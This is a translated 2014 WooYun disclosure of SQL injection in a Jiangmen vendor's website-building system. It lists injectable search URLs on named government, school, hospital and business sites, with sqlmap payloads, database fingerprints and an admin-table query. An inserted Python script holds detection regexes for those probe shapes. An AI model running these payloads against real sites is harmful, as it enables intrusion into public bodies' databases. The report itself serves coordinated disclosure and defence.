Vulnerability summary

Defect ID: wooyun-2014-074044

Title: SQL injection in a website-building system, affecting multiple government, enterprise and other websites

Vendor: Keyu Network (科域网络)

Author: 路人甲 (anonymous)

Submitted: 2014-08-27 18:05

Fix deadline: 2014-11-25 18:06

Published: 2014-11-25 18:06

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: handed over to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-08-27: Details sent to the vendor, awaiting vendor handling
2014-09-01: Vendor confirmed; details disclosed to the vendor only
2014-09-04: Details opened to third-party security partners
2014-10-26: Details disclosed to core white hats and domain experts
2014-11-05: Details disclosed to regular white hats
2014-11-15: Details disclosed to intern white hats
2014-11-25: Details disclosed to the public

Brief description:

SQL injection

Detailed description:

Jiangmen Keyu Network (江门科域网络)
Main site: http://www.iebcc.com/

[Screenshot: Snap78.jpg]


Looking at its customer list:

[Screenshot: Snap79.jpg]


Government and public institutions:

[Screenshot: Snap80.jpg]


Roughly 27 of them.
Since the back end is an Access database, I do not dump the tables here;
I only query the number of rows in the admin table.

Proof of vulnerability:

Government and public institutions:
Jiangmen Xinhui District Housing and Urban-Rural Development Bureau: injection in the search function
http://www.xhjsj.gov.cn/

[Screenshot: Snap73.jpg]


Entering a single quote (') in the search box:

[Screenshot: Snap74.jpg]


[Screenshot: Snap75.jpg]


Constructed injection URL:
http://www.xhjsj.gov.cn/search.asp?keyword=1&BtnFind.x=35&BtnFind.y=14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keyword
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=1%' AND 3552=3552 AND '%'='&BtnFind.x=35&BtnFind.y=14
---
[11:47:37] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access


[5 tables]
+---------+
| admin |
| article |
| images |
| info |
| video |
+---------+


The admin table contains two rows

[Screenshot: Snap81.jpg]


Appending admin to the URL redirects to the administrator login page

[Screenshot: Snap83.jpg]


-------
Jiangshun Bridge / Jiangmen Avenue (江顺大桥-江门大道)
http://www.jmjsdq.com
Injection point: http://www.jmjsdq.com/search.asp?keyword=1&imageField.x=0&imageField.y=0

[Screenshot: Snap85.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keyword
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=1%' AND 1732=1732 AND '%'='&imageField.x=0&imageField.y=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: keyword=1%' AND 9055=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (9055=9055) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(113)+CHAR(111)+CHAR(113))) AND '%'='&imageField.x=0&imageField.y=0
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: keyword=1%'; WAITFOR DELAY '0:0:5'--&imageField.x=0&imageField.y=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: keyword=1%' WAITFOR DELAY '0:0:5'--&imageField.x=0&imageField.y=0
---


web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[12:58:49] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select count(*) from admin;
[12:58:59] [INFO] fetching SQL SELECT statement query output: 'select count(*) from admin'
[12:58:59] [INFO] retrieved: 2
select count(*) from admin;: '2'
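The sqlmap output above shows the four probe shapes used against these sites (boolean-based blind, error-based CONVERT, stacked queries and WAITFOR DELAY). As an added example, not part of the original report, the script below triages IIS 6.0 W3C log lines for those shapes so an operator of one of the affected sites can find which parameters were probed; the log excerpt, IPs and regexes are constructed assumptions of this example.

```python
import re
from urllib.parse import parse_qsl

# Added example (not from the report): triage IIS 6.0 W3C log lines for the four
# probe shapes sqlmap reported on this page. The regexes are assumptions of this
# example, meant for log review rather than as a complete WAF rule set.
PROBES = {
    "boolean-blind": re.compile(r"'\s+AND\s+(\d+)=\1\s+AND\s+'", re.I),
    "error-based": re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I),
    "time-based": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "stacked": re.compile(r"'\s*;\s*\w", re.I),
}

# Constructed log excerpt in IIS W3C format; IPs and timestamps are made up.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2014-08-27 03:47:37 10.0.0.5 GET /search.asp keyword=1%25%27%20AND%203552%3D3552%20AND%20%27%25%27%3D%27&BtnFind.x=35&BtnFind.y=14 80 - 198.51.100.7 sqlmap/1.0-dev 200
2014-08-27 03:47:38 10.0.0.5 GET /search.asp keyword=1%25%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27--&imageField.x=0&imageField.y=0 80 - 198.51.100.7 Mozilla/5.0 200
2014-08-27 03:47:39 10.0.0.5 GET /search.asp keyword=bridge&imageField.x=0&imageField.y=0 80 - 192.0.2.10 Mozilla/5.0 200
2014-08-27 03:47:40 10.0.0.5 GET /show_news.asp guid=20140805113948583%27%20AND%201390%3D1390%20AND%20%27Nibh%27%3D%27Nibh 80 - 198.51.100.7 Mozilla/5.0 200
2014-08-27 03:47:41 10.0.0.5 GET /index.asp - 80 - 192.0.2.10 Mozilla/5.0 200
"""

def classify(value: str) -> list[str]:
    """Return the probe labels whose pattern matches one decoded parameter value."""
    return [name for name, rx in PROBES.items() if rx.search(value)]

def triage(log_text: str) -> list[tuple[str, str, str, list[str]]]:
    """Return (client ip, uri-stem, parameter, labels) for every flagged parameter."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # IIS announces the column order here
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split()))  # W3C fields are space separated
        if row.get("cs-uri-query", "-") == "-":
            continue                           # request had no query string
        # parse_qsl percent-decodes values, so the regexes see the raw payload
        for param, value in parse_qsl(row["cs-uri-query"], keep_blank_values=True):
            labels = classify(value)
            if labels:
                hits.append((row["c-ip"], row["cs-uri-stem"], param, labels))
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

Benign searches such as keyword=bridge produce no hit, while the probed keyword and guid parameters are reported together with the client address, which is the pivot an incident responder would use to scope the rest of the log.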


-------
Jiangmen Property Management Association
http://www.jmwyxh.org.cn
Injection point: http://www.jmwyxh.org.cn/show_news.asp?guid=20140805113948583

[Screenshot: Snap86.jpg]


GET parameter 'guid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 35 HTTP(s) requests:
---
Place: GET
Parameter: guid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: guid=20140805113948583' AND 1390=1390 AND 'Nibh'='Nibh
---


[Screenshot: Snap84.jpg]


-----
Wuyi University, School of Textile and Clothing
http://dept.wyu.edu.cn/fangzhi/search.asp?fieldname=title&keyword=0&imageField.x=0&imageField.y=0

[Screenshot: Snap87.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keyword
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fieldname=title&keyword=0%' AND 8654=8654 AND '%'='&imageField.x=0&imageField.y=0
---


[Screenshot: Snap88.jpg]


------
Jiangmen Red Cross Hospital
[Traces of a prior intrusion]

[Screenshot: Snap89.jpg]


-----
Jiangmen Transportation Engineering Quality Testing Station
Injection point: http://www.jmjtzjz.com/search.asp?fieldname=title&keyword=0&imageField.x=0&imageField.y=0

[Screenshot: Snap90.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.jmjtzjz.com:80/search.asp?fieldname=title&keyword=0%' AND 2971=2971 AND '%'='&imageField.x=0&imageField.y=0
---


[Screenshot: Snap91.jpg]


-------
Duruan Central Junior High School
Injection point:
http://www.drzxcz.com/search.asp?condition=content&keyword=0&x=0&y=0

[Screenshot: Snap93.jpg]


[Screenshot: Snap95.jpg]


---
Guangdong Geological Bureau, Sixth Geological Brigade
http://www.gddz6d.com/search.asp?keyword=1&imageField.x=0&imageField.y=0

[Screenshot: Snap96.jpg]


[Screenshot: Snap98.jpg]


Nanhai Funeral Home: http://www.nhbyg.com/news.asp?url=news.asp&keyword=0%27&BtnOk=%CB%D1%CB%F7
Jiangmen Xinhui District Urban Comprehensive Management Bureau: http://cgj.xinhui.gov.cn/search.asp?fenlei=1&keywords=0%27&submit.x=13&submit.y=16
Jiangmen Waterway Bureau: http://www.jmhdw.com/zwgk.asp?linkurl=zwgk.asp&keyword=0%27&imageField.x=0&imageField.y=0
=====================
There are many more; a few examples follow.
Portal sites

Jiangmen SEG Chesheng (江门赛格车圣): http://www.jm952100.com/shop.asp?keyword=0%27&imageField.x=0&imageField.y=0
China Taishan Jade Carving / Taishan Jade (中国台山玉雕-台山玉石): http://www.zgtsyd.com/products.asp?keyword=d%27&BtnOk.x=18&BtnOk.y=12
A mobile-phone online store: http://www.mfxshop.cn/mobile.asp?keyword=a%27&imageField.x=0&imageField.y=0


Enterprise sites

http://www.jmgongcheng.com/search.asp?keyword=a%27&imageField.x=14&imageField.y=13
http://www.ymyg360.com/products.asp?keyword=a&BtnSearch=%B2%FA%C6%B7%CB%D1%CB%F7
http://www.opasm.com.cn/products.asp?keyword=a&imageField.x=4&imageField.y=11



Fix recommendation:

Copyright notice: when reposting, credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 17

Confirmed: 2014-09-01 09:59

Vendor reply:

CNVD has confirmed and reproduced the described situation and has notified the software vendor by telephone and e-mail. In addition, based on the test cases, the matter has been forwarded by CNCERT to its Guangdong branch and reported to the CERNET emergency response organisation for handling of the relevant cases.

Latest status:

None yet